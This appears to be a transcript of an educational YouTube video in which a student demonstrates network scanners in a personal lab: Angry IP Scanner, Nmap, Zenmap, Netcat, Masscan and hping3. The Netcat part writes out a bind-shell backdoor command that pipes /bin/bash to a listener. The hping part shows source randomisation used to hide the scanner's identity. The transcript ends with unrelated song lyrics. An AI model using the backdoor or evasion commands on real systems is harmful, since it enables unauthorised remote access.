everyone, welcome. I'm here from CircleCyber. Today we are diving into the world of network security with a special guest presenter. Before we jump in, if you are interested in learning more about cybersecurity and keeping your network safe, be sure to smash the subscribe button and hit the notification bell so you never miss an upload videos from us. Now let's welcome one of my talented students, Amir. Amir has been working hard to learning everything he can about network security tools, and today he will share his knowledge with you all. Amir, take it away, please. Thank you.
Hello, Mr. Omid, and thank you for joining me. In the previous lessons, I talked about some important topics in cybersecurity, like DNS or domain name system, MAC address and IP address, TCP and UDP, and port numbers. And the last video, I talk about IP scanners and port scanners. And I explain about methods of port scanning. And I named 10 important IP scanners and port scanners. Now I want to explore how each of them works and try to use them in the real world. But before starting the lesson, let's check what scanners we are going to talk about today. In the third column, I've specified which OS I installed that particular scanner on in my personal penetration testing lab. Before we begin, all the videos have already been recorded and just display in this session. First tool is Angry IP Scanner. Angry IP Scanner is one of the famous scanners that has quite minimalistic UI and is very simple to use for scanning your network. When you first open Angry IP Scanner, it's going to populate the range of IPs for your network. But if it doesn't detect the right range for the networks, you could type in your starting and ending IP address here. If you don't have quite information about IP address, I explain about it deeply in another video that was about MAC address and IP address, and you can watch it in this channel. When you click start, it will find machines within that range in your local network. And as you can see with their IP address, it will show some information about them, like hostname that's assigned to that machine or what ports are open there. All IPs are going to have a color behind them. Green means it responded to the pings, so it's online and it has open ports. Red just means it doesn't respond to the pings at all. And blue means it's online, but it doesn't have any open ports. Angry IP Scanner has different options. Some of them are more important than others, and one of those is preferences. You can access to preferences by clicking on this icon or click on tools, then click on preferences. There are different parts in the open window. In the display tab, we can specify which devices should be shown to us. If we choose Alive Host only, it will show us all online devices with blue and green color. And if we choose Host with open ports only, it will just show us devices with green color. I choose Alive Host only. In the ports tab, we can specify the ports that we want to scan. For example, I add FTP, SSH, and Telnet ports to scan them further than HTTP and HTTPS. If you don't know what is ports numbers, I explain about them in another video that was about ports number, and you can watch it in this channel too. Okay, after that, I click OK and click Start to rescan my local network. As you can see, it's just show online devices now and scan them for specified ports. Another important option is features. You can access to features by clicking on this icon or click tools and then click on features. In the features, you can add some more information to display about device. For example, I add MAC address and filtered ports, then rescan my network. Okay, As you can see, it will show to me informations that selected in the features window. In the favorites tabs, we can save a specific IP range. To do that, click on favorites, then click on add current. And in the open window, write IP range and click OK. It's a good idea if we want to scan our local network weekly. Angry IP scanner is free to download, so it's open source, and it comes with both GUI and common LAN versions, so it's a very friendly interface, and it's a very lightweight software. In other side, Angry IP scanner lacks scalability on enterprise size networks. Another tool is Advanced IP Scanner. When you first open Advanced IP Scanner, it will populate the address range, but you could type it by yourself too, as you can see in this video. Then press Scan. You can go to View and select Show the Detail Pane. This is useful option that you can show. So you can click on particular host and it will give you more information. I don't have MAC address to be showing right now. So I'm going to actually get the MAC address showing. I'm going to blank. All you do is for the filter, you just right click and then choose MAC address and it will have field where the MAC address come in. As you can see, there are other options that I can add to show. If you go to setting, then click options. In the open window and resources, there are some scan preferences that you can choose to display. The resources sections allows you to select the resources to be scanned. The smaller the number of resources selected, the less time that the scanning process will take. For example, I turn on HTTPS and active username. There are some useful tools in Advanced IP Scanner. To use them, I go to particular device and right click on it, then click on tools. And as you can see, there are some tools in there. For example, if I click ping, my computer starts a terminal window with the ping commands to a remote computer. Advanced IP Scanner is free to use and it's a safe software and it has a very friendly interface and users of all levels can work with it. And Advanced IP Scanner is a very fast scanner. But also, while it allows for remote access to device, the tool's remote control features may not be as comprehensive as dedicated remote management solutions. And compared to more robust network scanning tools, Advanced IP Scanner may lack certain advanced functionalities. Another tool is fping. Fping is a simple command line tool to send ICMP. ICMP means Internet Control Message Protocol, similar to ping, but much higher performing when pinging a multiple host. Fping totally differs from ping in that you can define any number of hosts that come in the command line. If you want to see a ping environment, you could go to applications and then go to information gathering section and then go to live host identification. Here you can see fping. If you click on it, as you can see, showing a useful guide to use this tool. But it isn't necessary to remember all these flags. We are going to check some important flags today. As I said before, I'm going to test all of the tools in my personal penetration testing lab. So I know how many machines are in my network and what's the IP address of each of them. So now I want to test fping. I write fping and write IP address of my machines. After that, I want to write two random domain names in the internet, like google.com and amazon.com, for example. And finally, I add an IP address that I know it doesn't exist in my network because it's just a test. And as you can see, Fing detects which IP address is alive and which one isn't. If you need to ping range of IP address, you could use minus G flag. Let's check it. I write fping minus G and type a start of IP and end of IP range. For example, 192.168.10.0 and 192.168.10.10. Or you could write fping minus G 192.168.10.0/24. The following command will scan my whole network and pings each of the hosts to check whether they are alive or not. In all above commands, we could use minus G minus C flag too. With using minus C flag, you can assign the number of echo requests to be sent to the target. For example, I write fping minus C. For example, you choose number 5, 192.168.10.5. The following command send 5 requests to the target. Fping is a free tool which comes with Kali Linux and actually send ping packets to multiple IP addresses. But fping primarily relies on ICMP echo request packets. As a result, it may not be suitable for testing the availability of hosts that do not respond to ICMP requests. Some devices or firewalls may block ICMP traffic. Or unlike more comprehensive network scanning tools, fping doesn't perform port scanning or service detection. Next one is Nmap. The network mapper, or Nmap, is one of the most famous practical security tools available with a rich history and helpful documentation. If you want to see Nmap environments, you could go to application and then go to information gathering section. If you scroll it down, you could see it. Okay, here you can see a useful help for working with Nmap. Before everything, let's see what's my personal penetration testing lab's range IP. To see that, I just need to type ifconfig. It's a command for Linux to see your IP address. And as you can see, this is my Kali machine's netmask. Now, if I want to get information of the hosts that are available in my home network, I just type this command. Sudo nmap minus lowercase s capital P 192.168.10.0/24. After that, I should enter my root password. As you can see, it finds 7 hosts up in my network. If I want to check a single host, I should use the same command but type IP of that specific device. Minus sp means just do ping sweep scan and don't do port scan for now. Note that Nmap is a case sensitive, so pay attention on lowercase and capital letters. Now, if I want to check a status of specific ports in my whole network or in a specific device in my network, I should use this command. Sudo nmap minus p, and after p, I should choose my specific ports, for example, FTP, SSH, and HTTPS. 192.168.10.0/24. If I want to check these ports in the specific device, here I should just type IP of that device. After that, I hit enter. As you can see, the written ports are closed in my Kali machine, and they are filtered in my Windows machine and they are open in my meta-exploitable machine. In the last lesson, I talked about methods of port scanning like TCP full scan, null scan, fin scan, and something else. In the nmap, we could choose the methods of port scanning. To do that, we could use this switch. For example, sudo nmap minus lowercase s capital T space minus p, for example, 21, 22, 80, and 443. And after that, I should write my specific IP. In this case, 192.168.10.6. In this example, ST means a full scan or connect scan. Let's review methods of port scanning in the next page. One another time. If you don't have QUIT information about methods of port scanning, I explain about all of them in the last video that was about IP scanners and port scanners. Next command is sudo nmap minus capital O 192.168.10.6. Capital O is for OS detection. As you can see, in this house is a Linux. Let's check another one. Sudo nmap minus capital O 192.168.10.8. Okay, this one is a Windows. We could use this command to detect the OS of target. Nmap allows you to quickly map out a network without requiring complex command and or configuration. Also, nmap detects open ports and services on devices. It helps you identify which services are running, and it provides detailed information about the operating system running on devices, and you could choose methods of a scan rely on your purpose. But in other side, some nmap scans such as CineScan require raw packet privileges, which means running nmap as root or administrator. Or like any scanning tools, nmap may produce false positive or false negative results. And nmap can be resources intensive, especially when scanning large networks or performing comprehensive vulnerability assessments. Next tool is Zenmap. Zenmap is a GUI version of nmap. And I install it in my Windows machine to show it to you. But note that if we want to work with Zenmap, we should remember the commands of nmap. So if we want to work with Zenmap, before that, we should have information about nmap and the commands that we could use in nmap. Now, for example, I want to do connect scan whole my networks. So I type the command here. Nmap minus ST, as I said, ST is for full scan or connect scan. 192.168.10.0/24, and then hit enter. As you can see here, I can see all of online devices in my network. And as you can see, display of Zenmap is as well as Nmap. In ports tab, I can see open ports of each device in my network. As you can see in the video, I check some devices to show you. Another one is services tab. In the services tab, I can see each services is running on which device. Another part is topology tab. In the topology tab, as we can see, Zenmap detects my both vulnerable machines as a weak host. And my Windows machine is so-so. As you can see, it's a yellow color. It has yellow color. But my Kali machine is a strong and safe host. And it displayed to me by green color. ZenMap is an open source tool, which means it's free available for use, and it's relatively lightweight and straightforward to install. But sometimes ZenMap takes more time than usual for scanning. And occasionally, it may not accurately identify the target system's OS or operation system. Next tool is Netcat. Netcat is a simple and useful tool that pre-installed in Kali Linux. It's even considered a Swiss Army knife of network scanning. How to use Netcat for port scanning? To do that, just need to type nc-z-v 192.168.10.6 1-1000. It means that scan first 1000 ports in a specific IP. Netcat can also be used to chat between two users. We need to establish a connection before chatting. To do this, we are going to need two devices. One will play the role of initiator and one will play listener to start the conversation. And so once the connection is established, communication can be done from both ends. First, we will have to create a listener. We will use the following command to create listener. nc-lvvp4000. Now it's time to create an initiator. For this, we will just provide the IP address of the system where we start the listener followed by the port numbers. Note that we should use the same ports to create an initiator that was used in creating listener. Okay, now let's check it. For example, now I write a message, for example, hello world. And after that, I write, this is a test. Let's check it. As you can see in the listener, I can see the message. But if I couldn't see the second message, is that because I didn't hit the enter. Now that I hit the enter, as you can see, I can see the second message too. Now let's check, could we type a message here and see it in the initiator? For example, I type, welcome to Seco Cyber YouTube channel. And I should hit enter. As you can see, I can see the message in the initiator end. So as you can see, both devices can chat together. We can also create a backdoor using NC to create a backdoor on the target system that we can come back to at any time. Command for attacking a Linux system is nc-l-p6969, for example, -e/bin/bash. This will open a listener on the system that will pipe the command shell or the Linux bash shell to the connecting system. Now I just need to use this command in my second machine. nc-192.168.10.6.69.69. We should use same ports. Okay, let's check it. As you can see, I could see information of my vulnerable machine in my Kali machine. For example, if I say ifconfig, I see IP address of my vulnerable machine instead of my Kali machine. Netcat is a powerful utility that can read and write data across network connections using TCP or UDP protocols. Also, you can use Netcat to scan ports on the server to check if they are open or closed. Finally, Netcat provides remote shell access, allowing you to execute shell commands on the server from a client's machine. In other side, Netcat doesn't provide encryption by default, and it doesn't offer authentication mechanisms. So anyone with access to the network can potentially connect to your Netcat listener. Next tool is MassScan. MassScan is a fast version of Nmap, and it's very easy to work with. You just need a few options to use. We usually use MassScan when we want to scan large scale of networks, for example, class A or class B. If you don't have any information about classes of IP, I explain all of them in the IP lesson that you can watch it in this channel. Okay, let's start. Sudo for administrator access, MassScan, my network's range IP. You could type here a single IP too. After that, I use this flag, minus P. And after P, I could type ports that I want to be scanned. For example, 21, 22, 23, 80. Next one is minus minus rate equal 1000 for a specified number of packets sent to the target per second. Let's check the results. MassScan is designed for extremely fast and efficient port scans. It can send packets at high speed, allowing it to scan large IP address range in a matter of minutes. Also, it can scan both TCP and UDP ports, providing greater coverage of online services. And you can adjust the scanning speed using the minus minus rate option, tailoring it to your needs. But MassScan prioritizes speed over accuracy. While it's incredibly fast, it may not provide as detailed information as another scanners, such as Nmap. And it focuses on port scanning and lacks some features that we could see them in the Nmap. The last one is HPing. HPing or HPing version 3 is a command line utility for creating and sending custom TCP IP packets. If search HPing in applications, you can see help of this tool. As you can see. The simplest way to use HPing is like this. Sudo hping3, for example, 192.168.10.6. In this case, hping is very similar to regular ping. It's just send echo request and receive echo reply. If I add minus C flag to above command, I can specify number of packets. Or if I add minus P flag and type number of port, for example, 1024, I can specify its source port. This is for minus C. After that, I want to check minus P flag. For example, as I said, 124. In this case, HPing send packets from port 1024 in my Kali machine. Another useful command is sudo hping3 minus minus scan 1-65535 192.168.10.6. Now it would scan all ports and it will tell us that which ports are closed. The problem with this kind of scan is that it doesn't tell us exactly which ports are open. We could use this command too. Another command is sudo hping. As you can see, these are a closed port. Another port is sudo hping 3 minus minus scan 1-65535 192.168.10.0 minus s and minus minus random source. Minus s is for a specified random source port, and you could customize it too. And minus minus random source is to hide your identity. If you want to scan all ports on the target with service name and you don't want to expose your identity, you could use above command. Hping allows you to perform various tasks such as network scanning, fingerprinting, and testing network security. Also, it lets you simulate different types of network traffic, making it valuable for networking testing and troubleshooting, and spoof the source IP address, making your message appear from almost anywhere. In other side, Hping 3 has a steeper learning curve due to its rich feature set and command line syntax. Thank you, Mr. Omid, for your time, and thank you everyone to watching my presentation.
Okay, Amir, thank you for your presentation. I have a question. Do you know any knowledge about IPv6 scanning? How to scan IPv6 scanning for a range of IPv6 from port, opening port, something like that, similar to IPv4?
Honestly, not for now, because all of my researchers was about IP version 4.
Okay, because you didn't mention, I want to ask you. Okay, thank you. Thank you, Amir. It's a good presentation.
Thank you, too.
Okay, thank you for watching our video. Please subscribe and don't forget for... Do not hesitate for any question. Please leave a comment in comment section. Thank you. Have a nice day. Okay, thank you, Amir. Bye now.
Thank you. Bye bye. Funny when I break out a lifestyle dark. Honey when I rank in a tight flow spark. What a psycho drop. Playing dice, go start. Who are you? Better know yourself. Know your soul, gotta know your wealth. Slow your roll, get a hold, don't melt. And don't you fall when I feel like hell. Well, who am I? Am I me? I'm not the one you wanna fuck with. Late nights messing up my sleep, so I'm flustered. Taking out the